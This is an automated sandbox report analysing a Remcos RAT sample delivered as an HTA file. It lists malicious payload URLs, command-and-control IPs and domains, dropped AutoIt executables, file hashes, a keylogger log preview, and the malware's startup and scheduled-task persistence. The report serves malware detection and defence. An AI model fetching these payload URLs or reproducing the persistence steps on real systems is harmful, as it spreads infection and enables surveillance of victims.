Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	121 Virtualization/Sandbox Evasion	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	12 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
c2.hta	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com	0%	ReversingLabs

Source	Detection	Scanner	Label
https://myguyapp.com/W2.pdfn	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/c2.batO	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/c2.batD7	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zip7i	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf-	0%	Avira URL Cloud	safe
https://myguyapp.com/W2.pdf5i	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipi	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/c2.batB4	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipmp	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipsv	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/c2.batr7	0%	Avira URL Cloud	safe
https://candwfarmsllc.com/c2.bat	0%	Avira URL Cloud	safe
https://myguyapp.com/msword.zipurl2=https://	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
candwfarmsllc.com	193.26.115.39	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
geoplugin.net	178.237.33.50	true	false	high
me-work.com	193.26.115.39	true	false	high
myguyapp.com	193.26.115.39	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false		high
https://myguyapp.com/msword.zip	false		high
https://myguyapp.com/W2.pdf	true	Avira URL Cloud: safe	unknown
https://candwfarmsllc.com/c2.bat	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://myguyapp.com/W2.pdfn	tasklist.exe, 00000015.00000002.1880640482.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1876400429.000000000299A000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000015.00000003.1877656859.000000000299A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.7.dr	false		high
https://myguyapp.com/msword.zip7i	choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdf-	tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://candwfarmsllc.com/c2.batD7	mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://candwfarmsllc.com/c2.batB4	mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/W2.pdf5i	choice.exe, 0000001D.00000002.1941792062.00000000030A8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdf	Propose.com, 0000001C.00000003.1900480853.0000000001435000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895761959.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895909544.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1900506196.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895883699.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895934970.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895857397.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895814046.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1896002009.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1900449402.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.1895791109.0000000001435000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/X	Propose.com, 0000001C.00000000.1889679467.0000000000E85000.00000002.00000001.01000000.0000000F.sdmp, Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, LinkHub.com, 00000026.00000000.1915175704.0000000000BD5000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com, 00000028.00000002.2013144133.0000000000BD5000.00000002.00000001.01000000.00000011.sdmp, LinkHub.com.28.dr, Clinton.24.dr, Propose.com.17.dr	false		high
https://candwfarmsllc.com/c2.batO	mshta.exe, 00000000.00000003.1833648920.000000000A067000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipi	tasklist.exe, 00000013.00000002.1868526563.00000000028D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipmp	tasklist.exe, 00000013.00000002.1868648155.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipsv	tasklist.exe, 00000015.00000002.1880498269.0000000002968000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	msword.exe, 0000000C.00000002.1837747527.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000C.00000000.1815342236.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.10.dr	false		high
https://candwfarmsllc.com/	mshta.exe, 00000000.00000002.1836002063.000000000A178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1829402803.000000000A176000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1819440411.000000000A175000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP	cmd.exe, 00000021.00000002.1902491554.0000000002740000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.1902491554.000000000274B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Propose.com, 0000001C.00000003.1896524417.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000001C.00000003.2170139321.00000000038E5000.00000004.00000020.00020000.00000000.sdmp, Protocol.24.dr, LinkHub.com.28.dr, Propose.com.17.dr	false		high
https://candwfarmsllc.com/c2.batr7	mshta.exe, 00000000.00000003.1829604060.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1833064513.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1832614125.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1834844401.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://myguyapp.com/msword.zipurl2=https://	tasklist.exe, 00000013.00000003.1867332035.000000000290B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000013.00000003.1868074601.0000000002914000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	false
193.26.115.39	candwfarmsllc.com	Netherlands		46261	QUICKPACKETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585618
Start date and time:	2025-01-07 22:32:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	c2.hta
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winHTA@72/102@7/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 88 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.88.176, 2.16.168.105, 2.16.168.107, 34.237.241.83, 54.224.241.105, 18.213.11.84, 50.16.47.176, 172.64.41.3, 162.159.61.3, 199.232.210.172, 23.209.209.135, 23.44.136.159, 23.44.136.184, 23.44.136.138, 23.44.136.185, 23.44.136.152, 184.28.90.27, 52.149.20.212, 23.217.172.185, 13.107.246.45
Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
Execution Graph export aborted for target mshta.exe, PID 7308 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: c2.hta

Simulations

Behavior and APIs

Time	Type	Description
16:32:56	API Interceptor	1x Sleep call for process: mshta.exe modified
16:32:58	API Interceptor	58x Sleep call for process: powershell.exe modified
16:33:12	API Interceptor	1x Sleep call for process: msword.exe modified
16:33:14	API Interceptor	3x Sleep call for process: AcroCEF.exe modified
16:34:20	API Interceptor	200433x Sleep call for process: Propose.com modified
21:33:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
21:33:20	Task Scheduler	Run new task: Murray path: wscript s>//B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
178.237.33.50	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	c2.hta	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	1.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
193.26.115.39	c2.hta	Get hash	malicious	Remcos	Browse
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
me-work.com	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	193.26.115.21
	c2.hta	Get hash	malicious	XWorm	Browse	87.120.117.152
	p5.hta	Get hash	malicious	XWorm	Browse	45.88.186.197
bg.microsoft.map.fastly.net	Sburkholder.pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	U02LaPwnkd.exe	Get hash	malicious	ValleyRAT	Browse	199.232.210.172
	c2.hta	Get hash	malicious	Remcos	Browse	199.232.210.172
	FACTURAMAIL.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	3e18bdf74f3caef770a7edcf748bdaf0e6a4a21664e69.exe	Get hash	malicious	AsyncRAT, GhostRat	Browse	199.232.214.172
	Kawpow new.exe	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://coggle.it/diagram/Z3zkZPAQxQkDOgmo/t/-/1f6434bfba7d8aab898b2531849681e8b0d7342489acbbff6b172f8658a09526	Get hash	malicious	Unknown	Browse	199.232.214.172
	Here is the completed and scanned document.eml	Get hash	malicious	Unknown	Browse	199.232.214.172
	file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zip	Get hash	malicious	Unknown	Browse	199.232.214.172
	c2.hta	Get hash	malicious	Remcos	Browse	199.232.210.172
geoplugin.net	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	1.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATOM86-ASATOM86NL	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse	178.237.33.50
	17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	c2.hta	Get hash	malicious	Remcos	Browse	178.237.33.50
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
QUICKPACKETUS	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	https://z97f4f2525fyg27.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	172.82.129.154
	9W9jJCj9EV.bat	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	193.31.28.181
	3e88PGFfkf.exe	Get hash	malicious	DCRat	Browse	185.230.138.58
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	198.22.235.170

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://xyft.zmdusdxj.ru	Get hash	malicious	Unknown	Browse	193.26.115.39
	Globalfoundries eCHECK- Payment Advice.html	Get hash	malicious	Unknown	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	HaLCYOFjMN.exe	Get hash	malicious	DCRat, PureLog Stealer, RedLine, XWorm, zgRAT	Browse	193.26.115.39
	UXxZ4m65ro.exe	Get hash	malicious	Quasar	Browse	193.26.115.39
	Customer.exe	Get hash	malicious	XWorm	Browse	193.26.115.39
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	Solara.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	vRecording__0023secs__Stgusa.html	Get hash	malicious	Unknown	Browse	193.26.115.39
37f463bf4616ecd445d4a1937da06e19	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	setup.msi	Get hash	malicious	Unknown	Browse	193.26.115.39
	1.exe	Get hash	malicious	LummaC, XRed	Browse	193.26.115.39
	9876567899.bat.exe	Get hash	malicious	Lokibot	Browse	193.26.115.39
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	193.26.115.39
	c2.hta	Get hash	malicious	Remcos	Browse	193.26.115.39
	H565rymIuO.doc	Get hash	malicious	Unknown	Browse	193.26.115.39
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	193.26.115.39
	287438657364-7643738421.08.exe	Get hash	malicious	Unknown	Browse	193.26.115.39

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com	c2.hta	Get hash	malicious	Remcos	Browse
	[UPD]Intel_Unit.2.1.exe	Get hash	malicious	LummaC	Browse
	'Set-up.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	RailProvides_nopump.exe	Get hash	malicious	Remcos	Browse
	c2.hta	Get hash	malicious	Remcos	Browse
	installer_1.05_36.8.exe	Get hash	malicious	LummaC	Browse
	Setup.exe	Get hash	malicious	LummaC	Browse
	DansMinistrie.exe	Get hash	malicious	LummaC	Browse
	installer_1.05_36.7.exe	Get hash	malicious	LummaC Stealer	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
File Type:	data
Category:	dropped
Size (bytes):	144
Entropy (8bit):	3.4211860498498075
Encrypted:	false
SSDEEP:	3:rglswYNvbwb5JWRal2Jl+7R0DAlBG45klovDl6v:MlsNNkb5YcIeeDAlOWAv
MD5:	F9E542DEF223AE4D61AEE7D40A7FE478
SHA1:	C44E09B96FA3BEB73619AD55FAFF3DA604D8C77A
SHA-256:	3B88E66C2677FCE019C3A1058D0354004444B783DD70C001CB508A2A0256C717
SHA-512:	A0CAA8CC2CCCEFD33D9AC58E6CAACCCF8EACB5AB0F08086BC902FD8BB28DB777FE86AD0DF9603948FCCC571F2EFFE7E2825F218070DE7C72B4BDE5F496322A41
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.5./.0.1./.0.7. .1.6.:.3.3.:.4.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.17051736191799
Encrypted:	false
SSDEEP:	6:iOp/Wqe+q2Pwkn2nKuAl9OmbnIFUtL/WEUgWZmwl/WEUXVkwOwkn2nKuAl9Ombjd:7p/Wf+vYfHAahFUtL/WEUgW/l/WEUXVW
MD5:	33BC1DED4C6173B2F5ACDE933C24460F
SHA1:	13D34B04AFEF80BA0802321EB9B5D1C920D71BC3
SHA-256:	AA3176E455034ED92B7225736D273DF8BB5F6CAE05B6E4DE8E447E5CB9093FD7
SHA-512:	1C85CA877E4FA4C9EFB0F1C1DD626A3EB44726037E34143115BCF1FFD6AF1D62E96E9696435C9E1841CA6A70710DB880AE304C1E6FB202A6AF8BB95F0E6BA325
Malicious:	false
Preview:	2025/01/07-16:33:01.705 1f5c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-16:33:01.707 1f5c Recovering log #3.2025/01/07-16:33:01.707 1f5c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.17051736191799
Encrypted:	false
SSDEEP:	6:iOp/Wqe+q2Pwkn2nKuAl9OmbnIFUtL/WEUgWZmwl/WEUXVkwOwkn2nKuAl9Ombjd:7p/Wf+vYfHAahFUtL/WEUgW/l/WEUXVW
MD5:	33BC1DED4C6173B2F5ACDE933C24460F
SHA1:	13D34B04AFEF80BA0802321EB9B5D1C920D71BC3
SHA-256:	AA3176E455034ED92B7225736D273DF8BB5F6CAE05B6E4DE8E447E5CB9093FD7
SHA-512:	1C85CA877E4FA4C9EFB0F1C1DD626A3EB44726037E34143115BCF1FFD6AF1D62E96E9696435C9E1841CA6A70710DB880AE304C1E6FB202A6AF8BB95F0E6BA325
Malicious:	false
Preview:	2025/01/07-16:33:01.705 1f5c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/07-16:33:01.707 1f5c Recovering log #3.2025/01/07-16:33:01.707 1f5c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.182097590653461
Encrypted:	false
SSDEEP:	6:iOp/W5+q2Pwkn2nKuAl9Ombzo2jMGIFUtL/W0mWZmwl/W0NVkwOwkn2nKuAl9OmT:7p/W5+vYfHAa8uFUtL/WVW/l/WYV5Jfg
MD5:	929671F45389DA21DC25D997FD30F720
SHA1:	02A3CF6A5DB5F2028A26DF2CB120D489F321E90F
SHA-256:	F7C6BD540AE277CE6B1ACEC84B4D6471CBDF10E05C3B15B3051ACE40C3B30058
SHA-512:	A34AED6B30E04158F33C46A4D6FE1F3170A9149D79494D006C79AA4254C99554E842C10880AFB15DDA0338C42923907F0F97C304D7C85C26715B297E082FADE6
Malicious:	false
Preview:	2025/01/07-16:33:01.787 1fec Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-16:33:01.788 1fec Recovering log #3.2025/01/07-16:33:01.788 1fec Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.182097590653461
Encrypted:	false
SSDEEP:	6:iOp/W5+q2Pwkn2nKuAl9Ombzo2jMGIFUtL/W0mWZmwl/W0NVkwOwkn2nKuAl9OmT:7p/W5+vYfHAa8uFUtL/WVW/l/WYV5Jfg
MD5:	929671F45389DA21DC25D997FD30F720
SHA1:	02A3CF6A5DB5F2028A26DF2CB120D489F321E90F
SHA-256:	F7C6BD540AE277CE6B1ACEC84B4D6471CBDF10E05C3B15B3051ACE40C3B30058
SHA-512:	A34AED6B30E04158F33C46A4D6FE1F3170A9149D79494D006C79AA4254C99554E842C10880AFB15DDA0338C42923907F0F97C304D7C85C26715B297E082FADE6
Malicious:	false
Preview:	2025/01/07-16:33:01.787 1fec Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/07-16:33:01.788 1fec Recovering log #3.2025/01/07-16:33:01.788 1fec Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	475
Entropy (8bit):	4.977971331588537
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqBEsBdOg2H/caq3QYiubInP7E4T3y:Y2sRdsedMHO3QYhbG7nby
MD5:	0A8473C945879ECF7B64E80A61F14097
SHA1:	A0FF639D72810DC3CD35A5E568CD9CD96AAA2C8F
SHA-256:	B5A6668AAF43D6A66E29571604C4C825CA005BEBF243B146A3529648DE2E398F
